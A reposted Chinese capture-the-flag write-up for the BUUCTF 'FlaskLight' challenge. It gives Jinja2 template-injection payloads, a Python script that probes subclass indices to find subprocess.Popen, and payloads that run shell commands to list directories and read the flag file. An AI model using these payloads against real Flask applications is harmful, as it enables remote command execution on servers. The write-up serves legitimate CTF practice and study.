生活随笔
收集整理的這篇文章主要介紹了
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
題目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight
?search
={{7*7}}
?search
={{''.__class__
.__mro__
[2].__subclasses__
()}}
編寫腳本查找可利用的類
利用subprocess.Popen執行命令
import requests
import re
import html
import timeindex
= 0
for i
in range(170, 1000):try:url
= "http://17ad255a-204e-4624-b878-e3e0d62e526a.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i
) + "]}}"r
= requests
.get
(url
)res
= re
.findall
("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r
.text
)time
.sleep
(0.1)res
= html
.unescape
(res
[0])print(str(i
) + " | " + res
)if "subprocess.Popen" in res
:index
= i
breakexcept:continue
print("indexo of subprocess.Popen:" + str(index
))
?search
={{''.__class__
.__mro__
[2].__subclasses__
()[258]('ls',shell
=True,stdout
=-1).communicate
()[0].strip
()}}?search
={{''.__class__
.__mro__
[2].__subclasses__
()[258]('ls /flasklight',shell
=True,stdout
=-1).communicate
()[0].strip
()}}?search
={{''.__class__
.__mro__
[2].__subclasses__
()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell
=True,stdout
=-1).communicate
()[0].strip
()}}
原文作者:D15h35
鏈接:https://yanmymickey.github.io/2020/04/15/CTFwp/%5BCSCCTF%202019%20Qual%5DFlaskLight/
總結
以上是生活随笔為你收集整理的BUUCTF:[CSCCTF 2019 Qual]FlaskLight的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。
